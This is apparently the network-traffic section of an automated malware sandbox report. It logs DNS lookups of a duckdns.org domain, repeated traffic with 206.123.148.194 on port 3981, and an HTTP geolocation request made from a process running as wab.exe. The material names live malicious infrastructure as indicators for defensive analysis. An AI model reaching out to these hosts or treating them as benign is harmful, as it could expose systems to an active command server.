                                        Jul 1, 2024 16:20:09.777401924 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.777411938 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.777417898 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.777424097 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.777436018 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.777436972 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.777447939 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.777463913 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.777484894 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.778894901 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.778918982 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.778929949 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.778954983 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.779067993 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.779079914 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.779090881 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.779104948 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.779113054 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.779129028 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.813545942 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.813570023 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.813584089 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.813595057 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.813606977 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.813617945 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.813618898 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.813632011 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.813669920 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.813693047 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.822501898 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.822535038 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.822545052 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.822578907 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.822628021 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.822639942 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.822650909 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.822664022 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.822675943 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.822690964 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.822767019 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.822788000 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.822807074 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.822890043 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.822901011 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.822912931 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.822930098 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.822961092 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.823057890 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.823067904 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.823079109 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.823090076 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.823105097 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.823128939 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.823220015 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.823230028 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.823241949 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.823252916 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.823270082 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.823290110 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.823506117 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.823560953 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.823571920 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.823601007 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.823693991 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.823704958 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.823717117 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.823729038 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.823736906 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.823755980 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.823868990 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.823879004 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.823889017 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.823900938 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.823911905 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.823913097 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.823930979 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.823951006 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.824539900 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.824552059 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.824563980 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.824574947 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.824585915 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.824592113 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.824599981 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.824618101 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.824661016 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.824696064 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.824707985 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.824717999 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.824728966 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.824739933 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.824748039 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.824754000 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.824774027 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.824795961 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.825367928 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.825407982 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.825419903 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.825448990 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.825536966 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.825551987 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.825562954 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.825577974 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.825581074 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.825603008 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.825685978 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.825696945 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.825707912 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.825726032 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.825747967 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.828510046 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.828543901 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.828556061 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.828596115 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.828608036 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.828619003 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.828629971 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.828643084 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.828655958 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.828675985 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.828721046 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.828761101 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.867362976 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.867383003 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.867394924 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.867408037 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.867479086 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.867475986 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.867496967 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.867501020 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.867515087 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.867527008 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.867539883 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.867542982 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.867567062 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.867670059 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.867682934 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.867712021 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.867759943 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.867770910 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.867783070 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.867794037 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.867799044 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.867806911 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.867815018 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.867819071 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.867830992 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.867846966 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.867882013 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.868089914 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.868103027 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.868113995 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.868124962 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.868136883 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.868149042 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.868151903 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.868170977 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.868191957 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.868375063 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.868386030 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.868397951 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.868408918 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.868421078 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.868428946 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.868432999 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.868443966 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.868448973 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.868455887 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.868469000 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.868474960 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.868489027 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.868503094 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.868530989 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.868899107 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.868910074 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.868957996 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.870672941 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.870698929 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.870712042 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.870744944 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.870851994 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.870862961 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.870873928 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.870887041 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.870893002 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.870898962 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.870913982 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.870939970 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.906089067 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.906126022 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.906137943 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.906166077 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.906202078 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.906214952 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.906225920 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.906238079 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.906241894 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.906260967 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.914736986 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.914773941 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.914791107 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.914792061 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.914829016 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.914829969 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.914843082 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.914859056 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.914871931 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.914879084 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.914908886 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.914983034 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.915097952 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.915108919 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.915121078 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.915131092 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.915142059 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.915143967 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.915154934 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:09.915169954 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:09.915199995 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:12.776828051 CEST398160919206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:12.791511059 CEST609193981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:12.796439886 CEST398160919206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:13.511673927 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:13.516612053 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:13.516627073 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:13.516661882 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:13.516691923 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:13.516696930 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:13.516706944 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:13.516730070 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:13.516855001 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:13.516864061 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:13.516882896 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:13.516891956 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:13.516966105 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:13.517005920 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:13.522711039 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:13.522758007 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:13.522767067 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:13.522800922 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:13.523289919 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:13.523299932 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:13.523303986 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:13.549299955 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:13.554451942 CEST398160920206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:13.554505110 CEST609203981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:31.358753920 CEST398160919206.123.148.194192.168.2.9
                                        Jul 1, 2024 16:20:31.403569937 CEST609193981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:37.576643944 CEST60918443192.168.2.9192.185.112.252
                                        Jul 1, 2024 16:20:37.576968908 CEST609193981192.168.2.9206.123.148.194
                                        Jul 1, 2024 16:20:37.577112913 CEST6092180192.168.2.9178.237.33.50

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Jul 1, 2024 16:19:06.040702105 CEST6296953192.168.2.91.1.1.1
                                        Jul 1, 2024 16:19:06.153840065 CEST53629691.1.1.1192.168.2.9
                                        Jul 1, 2024 16:19:19.478301048 CEST53531901.1.1.1192.168.2.9
                                        Jul 1, 2024 16:19:33.223593950 CEST5358996162.159.36.2192.168.2.9
                                        Jul 1, 2024 16:19:33.708933115 CEST5459853192.168.2.91.1.1.1
                                        Jul 1, 2024 16:19:33.717116117 CEST53545981.1.1.1192.168.2.9
                                        Jul 1, 2024 16:19:50.674932957 CEST5339653192.168.2.91.1.1.1
                                        Jul 1, 2024 16:19:50.788693905 CEST53533961.1.1.1192.168.2.9
                                        Jul 1, 2024 16:19:55.511687994 CEST5221353192.168.2.91.1.1.1
                                        Jul 1, 2024 16:19:56.497560024 CEST5221353192.168.2.91.1.1.1
                                        Jul 1, 2024 16:19:57.513597965 CEST5221353192.168.2.91.1.1.1
                                        Jul 1, 2024 16:19:59.528898001 CEST5221353192.168.2.91.1.1.1
                                        Jul 1, 2024 16:20:01.536102057 CEST53522131.1.1.1192.168.2.9
                                        Jul 1, 2024 16:20:01.536118031 CEST53522131.1.1.1192.168.2.9
                                        Jul 1, 2024 16:20:01.536137104 CEST53522131.1.1.1192.168.2.9
                                        Jul 1, 2024 16:20:01.536145926 CEST53522131.1.1.1192.168.2.9
                                        Jul 1, 2024 16:20:01.538413048 CEST5225853192.168.2.91.1.1.1
                                        Jul 1, 2024 16:20:02.544224024 CEST5225853192.168.2.91.1.1.1
                                        Jul 1, 2024 16:20:03.544358015 CEST5225853192.168.2.91.1.1.1
                                        Jul 1, 2024 16:20:05.570324898 CEST5225853192.168.2.91.1.1.1
                                        Jul 1, 2024 16:20:06.150541067 CEST53522581.1.1.1192.168.2.9
                                        Jul 1, 2024 16:20:06.150625944 CEST53522581.1.1.1192.168.2.9
                                        Jul 1, 2024 16:20:06.151247978 CEST53522581.1.1.1192.168.2.9
                                        Jul 1, 2024 16:20:06.151258945 CEST53522581.1.1.1192.168.2.9
                                        Jul 1, 2024 16:20:08.028290033 CEST5977953192.168.2.91.1.1.1
                                        Jul 1, 2024 16:20:08.037326097 CEST53597791.1.1.1192.168.2.9

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Jul 1, 2024 16:19:06.040702105 CEST192.168.2.91.1.1.10xf5dStandard query (0)contemega.com.doA (IP address)IN (0x0001)false
                                        Jul 1, 2024 16:19:33.708933115 CEST192.168.2.91.1.1.10x7c27Standard query (0)171.39.242.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                        Jul 1, 2024 16:19:50.674932957 CEST192.168.2.91.1.1.10xa4b7Standard query (0)contemega.com.doA (IP address)IN (0x0001)false
                                        Jul 1, 2024 16:19:55.511687994 CEST192.168.2.91.1.1.10x4bfeStandard query (0)janbours92harbu02.duckdns.orgA (IP address)IN (0x0001)false
                                        Jul 1, 2024 16:19:56.497560024 CEST192.168.2.91.1.1.10x4bfeStandard query (0)janbours92harbu02.duckdns.orgA (IP address)IN (0x0001)false
                                        Jul 1, 2024 16:19:57.513597965 CEST192.168.2.91.1.1.10x4bfeStandard query (0)janbours92harbu02.duckdns.orgA (IP address)IN (0x0001)false
                                        Jul 1, 2024 16:19:59.528898001 CEST192.168.2.91.1.1.10x4bfeStandard query (0)janbours92harbu02.duckdns.orgA (IP address)IN (0x0001)false
                                        Jul 1, 2024 16:20:01.538413048 CEST192.168.2.91.1.1.10x729eStandard query (0)janbours92harbu02.duckdns.orgA (IP address)IN (0x0001)false
                                        Jul 1, 2024 16:20:02.544224024 CEST192.168.2.91.1.1.10x729eStandard query (0)janbours92harbu02.duckdns.orgA (IP address)IN (0x0001)false
                                        Jul 1, 2024 16:20:03.544358015 CEST192.168.2.91.1.1.10x729eStandard query (0)janbours92harbu02.duckdns.orgA (IP address)IN (0x0001)false
                                        Jul 1, 2024 16:20:05.570324898 CEST192.168.2.91.1.1.10x729eStandard query (0)janbours92harbu02.duckdns.orgA (IP address)IN (0x0001)false
                                        Jul 1, 2024 16:20:08.028290033 CEST192.168.2.91.1.1.10x4b1aStandard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Jul 1, 2024 16:19:06.153840065 CEST1.1.1.1192.168.2.90xf5dNo error (0)contemega.com.do192.185.112.252A (IP address)IN (0x0001)false
                                        Jul 1, 2024 16:19:33.717116117 CEST1.1.1.1192.168.2.90x7c27Name error (3)171.39.242.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                        Jul 1, 2024 16:19:50.788693905 CEST1.1.1.1192.168.2.90xa4b7No error (0)contemega.com.do192.185.112.252A (IP address)IN (0x0001)false
                                        Jul 1, 2024 16:20:01.536102057 CEST1.1.1.1192.168.2.90x4bfeServer failure (2)janbours92harbu02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                        Jul 1, 2024 16:20:01.536118031 CEST1.1.1.1192.168.2.90x4bfeServer failure (2)janbours92harbu02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                        Jul 1, 2024 16:20:01.536137104 CEST1.1.1.1192.168.2.90x4bfeServer failure (2)janbours92harbu02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                        Jul 1, 2024 16:20:01.536145926 CEST1.1.1.1192.168.2.90x4bfeServer failure (2)janbours92harbu02.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                        Jul 1, 2024 16:20:06.150541067 CEST1.1.1.1192.168.2.90x729eNo error (0)janbours92harbu02.duckdns.org206.123.148.194A (IP address)IN (0x0001)false
                                        Jul 1, 2024 16:20:06.150625944 CEST1.1.1.1192.168.2.90x729eNo error (0)janbours92harbu02.duckdns.org206.123.148.194A (IP address)IN (0x0001)false
                                        Jul 1, 2024 16:20:06.151247978 CEST1.1.1.1192.168.2.90x729eNo error (0)janbours92harbu02.duckdns.org206.123.148.194A (IP address)IN (0x0001)false
                                        Jul 1, 2024 16:20:06.151258945 CEST1.1.1.1192.168.2.90x729eNo error (0)janbours92harbu02.duckdns.org206.123.148.194A (IP address)IN (0x0001)false
                                        Jul 1, 2024 16:20:08.037326097 CEST1.1.1.1192.168.2.90x4b1aNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                        HTTP Request Dependency Graph

                                        • contemega.com.do
                                        • geoplugin.net

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.960921178.237.33.50801712C:\Program Files (x86)\Windows Mail\wab.exe
                                        TimestampBytes transferredDirectionData
                                        Jul 1, 2024 16:20:08.043937922 CEST71OUTGET /json.gp HTTP/1.1
                                        Host: geoplugin.net
                                        Cache-Control: no-cache
                                        Jul 1, 2024 16:20:08.676223040 CEST1170INHTTP/1.1 200 OK
                                        date: Mon, 01 Jul 2024 14:20:08 GMT
                                        server: Apache
                                        content-length: 962
                                        content-type: application/json; charset=utf-8
                                        cache-control: public, max-age=300
                                        access-control-allow-origin: *
